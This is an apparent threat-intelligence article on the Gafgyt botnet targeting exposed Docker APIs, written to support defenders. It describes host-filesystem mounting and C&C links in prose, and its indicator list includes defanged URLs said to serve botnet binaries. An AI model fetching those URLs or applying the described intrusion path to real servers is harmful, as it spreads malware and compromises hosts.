Follow on X RSS Feed
Malware

Gafgyt Malware Expands Its Reach Targeting Docker Servers

Cybersec Sentinel

5 min read
Gafgyt Malware Expands Its Reach Targeting Docker Servers

Threat Group: Various Cybercriminal Entities
Threat Type: Botnet Malware
Exploited Vulnerabilities: Misconfigured Docker Remote API servers, weak/default credentials in IoT devices
Malware Used: Gafgyt (also known as Bashlite, Lizkebab)
Threat Score: High (8.5/10) — Due to its expansion into Docker environments and potential for widespread DDoS attacks
Last Threat Observation: December 3, 2024, by Trend Micro

Overview

Gafgyt malware, also known as Bashlite or Lizkebab, has traditionally been a prominent threat in the Internet of Things (IoT) landscape, targeting vulnerable devices such as routers, DVRs, and cameras to form extensive botnets for launching distributed denial-of-service (DDoS) attacks. Recent research has revealed a significant shift in its behavior as it expands its scope to exploit misconfigured Docker Remote API servers. By attacking Docker environments, the malware moves beyond IoT devices, positioning itself as a versatile threat capable of leveraging modern containerized infrastructure to amplify its impact.

This new tactic involves exploiting publicly exposed Docker Remote API servers to create malicious containers based on legitimate images like “alpine.” These containers are then weaponized by deploying Gafgyt binaries, which can escalate privileges, access host file systems, and execute devastating DDoS attacks. This evolution not only increases the potential attack surface but also signals that threat actors are increasingly focusing on leveraging weaknesses in cloud-native environments to orchestrate large-scale disruptions. Organizations relying on containerized applications and infrastructure must recognize this shift and adapt their security strategies accordingly.

Key Details

  • Delivery Method:
    • Exploitation of misconfigured Docker Remote API servers to deploy malicious containers.
    • Abuse of weak or default credentials in IoT devices to facilitate unauthorized access.
  • Targets:
    • Publicly exposed Docker Remote API servers lacking proper security configurations.
    • Vulnerable IoT devices, including routers, cameras, and DVRs.
  • Functions:
    1. Distributed Denial-of-Service (DDoS) Attacks:
      • Launches various types of DDoS attacks, such as UDP, TCP, ICMP, SYN, and HTTP floods, to overwhelm target systems.
    2. Privilege Escalation:
      • Utilizes commands like chroot and bind to mount the host's root directory within the container, enabling access to the host filesystem and potential control over the host system.
    3. Persistence Mechanisms:
      • Implements persistence strategies using systemd services or cron jobs to maintain long-term access on compromised systems.
    4. Command and Control (C&C) Communication:
      • Connects to hardcoded C&C servers to receive instructions and updates, facilitating coordinated attack campaigns.
    5. Network Scanning:
      • Scans for other vulnerable devices within the network to propagate the infection and expand the botnet.
  • Obfuscation Techniques:
    • Deploys evasion methods such as checking for similar processes to avoid detection.
    • Uses legitimate Docker images (e.g., "alpine") to create containers, reducing suspicion.
    • Employs Base64 encoding for payloads to obscure malicious code.
  • Notable Variants:
    • Perfctl Malware:
      • Observed exploiting exposed Docker Remote API servers to deploy cryptocurrency mining operations.
      • Utilizes similar tactics, techniques, and procedures (TTPs) as Gafgyt, indicating potential code sharing or evolution.
      • Demonstrates the adaptability of malware families in targeting containerized environments.
  • Recent Developments:
    • October 2024:
      • Attackers exploited exposed Docker Remote API servers to deploy the perfctl malware, highlighting a critical need for enhanced security in containerized infrastructures.
      • The attack sequence involved creating Docker containers with specific settings and executing Base64 encoded payloads, leading to privilege escalation and deployment of malicious binaries disguised as PHP extensions.
      • Evasion techniques included checking for similar processes and creating custom functions to download files, emphasizing the sophistication of the attack.

Attack Vectors

Gafgyt malware employs a multi-pronged approach to compromise systems, exploiting vulnerabilities in both traditional IoT devices and modern containerized environments. Its latest shift to targeting Docker Remote API servers demonstrates its evolving tactics, making it a versatile threat capable of exploiting a wide range of systems. Below is a detailed breakdown of the attack vectors used:

  1. Exploitation of Misconfigured Docker Remote API Servers
    • Initial Access: Attackers identify publicly exposed Docker Remote API servers with weak or absent authentication mechanisms. These servers are often misconfigured, leaving them vulnerable to unauthorized access.
    • Container Deployment: Using legitimate Docker images (e.g., "alpine"), attackers create containers to deploy Gafgyt binaries. Commands such as chroot and bind allow the malware to mount the host filesystem, enabling privilege escalation and potential control over the host system.
    • Payload Execution: The containers execute Gafgyt binaries with hardcoded C&C server addresses, facilitating communication for attack coordination.
  2. Targeting IoT Devices with Weak Security Configurations
    • Credential Exploitation: Gafgyt scans for IoT devices with open Telnet or SSH ports and attempts to gain access using default or weak credentials.
    • Vulnerability Exploitation: The malware also leverages known vulnerabilities in IoT devices to deploy malicious payloads and expand its botnet.
    • Self-Propagation: Once a device is compromised, Gafgyt scans the network for additional vulnerable devices to infect.
  3. Privilege Escalation and Host System Compromise
    • After gaining access to Docker or IoT devices, Gafgyt escalates privileges by exploiting insecure configurations. For Docker, it mounts the host filesystem to the container environment, granting access to critical system directories.
    • In IoT environments, it executes system-level commands to embed itself into the target device's operating system.
  4. Command and Control (C&C) Communication
    • Gafgyt communicates with hardcoded C&C servers to receive commands, download additional payloads, and orchestrate coordinated distributed denial-of-service (DDoS) attacks.
    • The malware can dynamically adapt its attack protocols based on instructions from the C&C server.
  5. Distributed Denial-of-Service (DDoS) Attacks
    • Gafgyt launches DDoS attacks using various protocols, including TCP, UDP, ICMP, SYN, and HTTP floods.
    • These attacks are aimed at overwhelming target networks, rendering them unavailable to legitimate users. The inclusion of HTTP-based attacks indicates a focus on application-layer disruptions.
  6. Backup Tactics for Failed Container Deployment
    • In cases where the initial container creation request fails, attackers attempt alternative methods. For instance, they may deploy a secondary Gafgyt binary (e.g., "atlas.i586") or use a shell script (e.g., "cve.sh") to download and execute botnet binaries for various architectures.

Known Indicators of Compromise (IoCs)

IPv4

  • hxxp://178[.]215[.]238[.]24
  • hxxp://178[.]215[.]238[.]31

FileHash-MD5

  • d6d51754e28b24f50dc43048ee4db87f

FileHash-SHA1

  • c4170ea247cf32eaabbfa08b6868285fe3c24254

FileHash-SHA256

  • 0b7e14e3305fd25b250ad494c014b0f8dfefaf0f3e8413bd797db12dd2eb9d8c
  • 156c85a09a1d5d753ce3fd128e0bb6097bb5b18e6cc0ffe6f9bc99a218a21ed9
  • 19778568781fd397ee2415d0a3593ffcaff4f333cdc27e52a1b23e07de08fdb6
  • 36ee47d10acbf8fbc7b16d4d237e2be567491b95dcd333856268c6c63a02f358
  • 68c215494fd35e097bf76eb3886b95ec66fdc707ebcf10f221b4db4ac2cd6d70
  • 6b385dc32daff689c1c448bf5f9151996abbac730e167a9cbfa9111591f253ea
  • a79a9653209c9d942dee0be597e04845fc5250880edcc5c3cb50110153925a03
  • b7f0ac1551ab58a1b84ba8e63dfc98dd126f7abe686137cbffc8ff95bfbac1ba
  • bb2bd8819045055af5295c23d1293b2d215fabe7dcf097813b9624ab98a13976
  • c1c03eab6bbca461f4a9dc7395103cdb0aa018563e835150c66228f3d7edadaa
  • ed6c93faebd9a60e132f4f952a1b516e758ce0e445b225eb702dfd2c8c2db6c0
  • f7004355f2bf653d3f055bc674822f99a8ff3692a02c1aec6b727a782e37b836
  • f8388cba15175fa7fda8daacfd095972e1a96faaabeede411f99f42f71ae395b

URL

  • hxxp://178[.]215[.]238[.]31/bins/atlas[.]arm4
  • hxxp://178[.]215[.]238[.]31/bins/atlas[.]arm5
  • hxxp://178[.]215[.]238[.]31/bins/atlas[.]arm6
  • hxxp://178[.]215[.]238[.]31/bins/atlas[.]arm7
  • hxxp://178[.]215[.]238[.]31/bins/atlas[.]i586
  • hxxp://178[.]215[.]238[.]31/bins/atlas[.]i686
  • hxxp://178[.]215[.]238[.]31/bins/atlas[.]m68k
  • hxxp://178[.]215[.]238[.]31/bins/atlas[.]mips
  • hxxp://178[.]215[.]238[.]31/bins/atlas[.]mipsel
  • hxxp://178[.]215[.]238[.]31/bins/atlas[.]sh4

Mitigation and Prevention

  1. Secure Docker Configurations:
    • Restrict Docker Remote API access with strong authentication and network whitelisting.
  2. Regular Updates:
    • Patch Docker and related software frequently to address known vulnerabilities.
  3. Container Security:
    • Avoid privileged container modes.
    • Use trusted, verified Docker images.
  4. Network Monitoring:
    • Continuously analyze traffic patterns for anomalies associated with DDoS activity.
  5. User Awareness:
    • Educate IT staff on potential misuse of container systems and response protocols.

Conclusion

The evolution of Gafgyt malware from a botnet targeting IoT devices to a threat exploiting Docker environments highlights a dangerous shift in the cyber threat landscape. This adaptability showcases the growing sophistication of attackers, who now leverage vulnerabilities in modern infrastructure to amplify their impact. By targeting misconfigured Docker Remote API servers, Gafgyt not only increases its reach but also demonstrates how easily overlooked configurations can lead to significant security breaches. Its ability to launch devastating DDoS attacks while evading detection underscores the urgent need for heightened vigilance and robust security measures.

To combat this evolving threat, organizations must act decisively. Securing Docker environments, patching vulnerabilities, and enforcing strong authentication protocols are critical to reducing the attack surface. Additionally, proactive threat monitoring and education can empower teams to recognize and respond to emerging threats like Gafgyt. The stakes are high—failing to address this malware’s advanced tactics risks leaving critical systems exposed to widespread disruption. The fight against Gafgyt serves as a stark reminder that in cybersecurity, constant evolution and preparedness are the only defenses against an ever-adapting adversary.

Sources

  1. Trend Micro, "Gafgyt Malware Broadens Its Scope in Recent Attacks,"
  2. Alienvault "Indicators of Compromise"